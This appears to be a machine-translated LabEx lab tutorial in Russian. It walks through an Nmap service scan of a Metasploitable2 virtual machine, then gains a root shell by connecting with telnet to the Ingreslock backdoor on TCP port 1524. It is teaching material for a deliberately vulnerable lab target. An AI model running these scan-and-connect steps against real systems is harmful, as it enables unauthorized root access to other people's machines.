Эксплуатация уязвимости Ingreslock с помощью Nmap

NmapNmapBeginner
Практиковаться сейчас

💡 Этот учебник переведен с английского с помощью ИИ. Чтобы просмотреть оригинал, вы можете перейти на английский оригинал

Введение

В этом лабораторном занятии вы научитесь эксплуатировать уязвимость сервиса Ingreslock для получения прав root на целевой машине. Лабораторная среда основана на виртуальных машинах Kali и Metasploitable2, предоставленных LabEx. Цель этого лабораторного занятия - понять уязвимость Ingreslock, выполнить сканирование на проникновение с использованием Nmap и, в конечном итоге, получить права root на машине Metasploitable2 путем эксплоитации бэкдора Ingreslock.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL wireshark(("Wireshark")) -.-> wireshark/WiresharkGroup(["Wireshark"]) nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/port_scanning("Port Scanning Methods") nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/timing_performance("Timing and Performance") nmap/NmapGroup -.-> nmap/service_detection("Service Detection") wireshark/WiresharkGroup -.-> wireshark/packet_capture("Packet Capture") subgraph Lab Skills nmap/port_scanning -.-> lab-416124{{"Эксплуатация уязвимости Ingreslock с помощью Nmap"}} nmap/host_discovery -.-> lab-416124{{"Эксплуатация уязвимости Ingreslock с помощью Nmap"}} nmap/target_specification -.-> lab-416124{{"Эксплуатация уязвимости Ingreslock с помощью Nmap"}} nmap/timing_performance -.-> lab-416124{{"Эксплуатация уязвимости Ingreslock с помощью Nmap"}} nmap/service_detection -.-> lab-416124{{"Эксплуатация уязвимости Ingreslock с помощью Nmap"}} wireshark/packet_capture -.-> lab-416124{{"Эксплуатация уязвимости Ingreslock с помощью Nmap"}} end

Понимание уязвимости Ingreslock и настройка среды

Уязвимость Ingreslock - это старая, но все еще актуальная уязвимость безопасности, связанная с системой управления базами данных (СУБД) Ingres. TCP-порт 1524 часто используется атакающими как порт бэкдора для сохранения доступа к скомпрометированным системам.

На этом этапе вы узнаете о уязвимости Ingreslock и ее последствиях.

Уязвимость Ingreslock возникает из-за того, что TCP-порт 1524 обычно использовался атакающими как порт прослушивания бэкдора после успешного взлома системы. Простота эксплоитации этой уязвимости заключается в возможности получить доступ с правами root на целевую машину, просто подключившись к открытому порту.

Хотя эта уязвимость считается устаревшей, она все еще присутствует в некоторых устаревших системах, поэтому стоит понять и исследовать ее в контролируемой среде.

  1. Откройте терминал xfce на хост-машине LabEx и запустите целевую машину Metasploitable2, выполнив следующую команду:
sudo virsh start Metasploitable2

Подождите, пока целевая машина запустится, это может занять от 1 до 3 минут.

  1. Проверьте связь с целевой машиной, отправив ей пинг:
ping 192.168.122.102

Нажмите Ctrl+C, чтобы остановить пинг.

  1. Запустите контейнер Kali Linux и войдите в среду bash, выполнив команду:
docker run -ti --network host b5b709a49cd5 bash
  1. Внутри контейнера Kali проверьте сетевое соединение с целевой машиной:
ping 192.168.122.102

Нажмите Ctrl+C, чтобы остановить пинг.

Выполнение сканирования на проникновение

На этом этапе вы выполните сканирование на проникновение на целевой машине Metasploitable2 с использованием Nmap, чтобы определить открытые порты и запущенные на цели сервисы.

  1. Запустите виртуальную машину Metasploitable2 и убедитесь, что она работает.
  2. Запустите контейнер Kali и войдите в оболочку bash.
  3. Внутри контейнера Kali выполните следующую команду для выполнения комплексного сканирования целевой машины:
nmap -sV -T4 target-ip-address

Опция -sV instructs Nmap to probe open ports to determine service/version information, while -T4 sets the timing template to an aggressive level (higher values from 0 to 5 increase the aggressiveness).

Запустите службу PostgreSQL и инициализируйте базу данных Metasploit:

cd ~
service postgresql start
msfdb init

Запустите консоль Metasploit:

msfconsole

Выполните комплексное сканирование целевой машины:

nmap -sV -T4 192.168.122.102

Вот пример вывода, который вы можете увидеть:

[*] exec: nmap -sV -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-24 20:47 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0037s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login
514/tcp  open  shell?

...

Эта последовательность команд запускает службу PostgreSQL, инициализирует базу данных Metasploit, запускает консоль Metasploit и затем выполняет комплексное сканирование целевой машины с использованием Nmap.

Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку

Эксплоитация бэкдора Ingreslock

На этом этапе вы эксплоитируете уязвимость бэкдора Ingreslock для получения прав root на целевой машине Metasploitable2.

  1. Во - первых, если вы не находитесь в консоли Metasploit, вам нужно запустить консоль Metasploit:
cd ~
msfconsole
  1. Установите пакет telnet в консоли Metasploit:
apt-key del ED444FF07D8D0BF6 && apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6 && apt update && apt install telnet
  1. Используйте команду telnet для подключения к порту бэкдора Ingreslock на целевой машине:
telnet 192.168.122.102 1524

Если соединение установлено успешно, вы должны получить права root на целевой машине.

  1. Теперь вам нужно проверить, что эксплоитация бэкдора Ingreslock прошла успешно, проверив IP - адрес, имя хоста и текущего пользователя на скомпрометированной машине. После подключения к целевой машине через бэкдор Ingreslock выполните следующие команды:

Проверьте IP - адрес скомпрометированной машины:

ifconfig

Проверьте имя хоста скомпрометированной машины:

hostname

Проверьте текущего пользователя на скомпрометированной машине:

whoami

Если эксплоитация прошла успешно, вы должны увидеть IP - адрес, имя хоста и текущего пользователя root на целевой машине.

Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку

Итог

В этом лабораторном занятии вы узнали о уязвимости Ingreslock, которая позволяет атакающим получить права root на скомпрометированных системах, подключившись к TCP - порту 1524. Вы выполнили сканирование на проникновение с использованием Nmap, чтобы определить открытые порты и сервисы на целевой машине. После обнаружения порта бэкдора Ingreslock вы эксплоитировали уязвимость с помощью команды telnet для получения прав root. Наконец, вы проверили успешность эксплоитации, проверив IP - адрес, имя хоста и текущего пользователя на скомпрометированной машине. Это лабораторное занятие дало практический опыт в понимании и эксплоитации реальной уязвимости, подчеркивая важность применения безопасности - исправлений и усиления защиты систем от таких бэкдоров.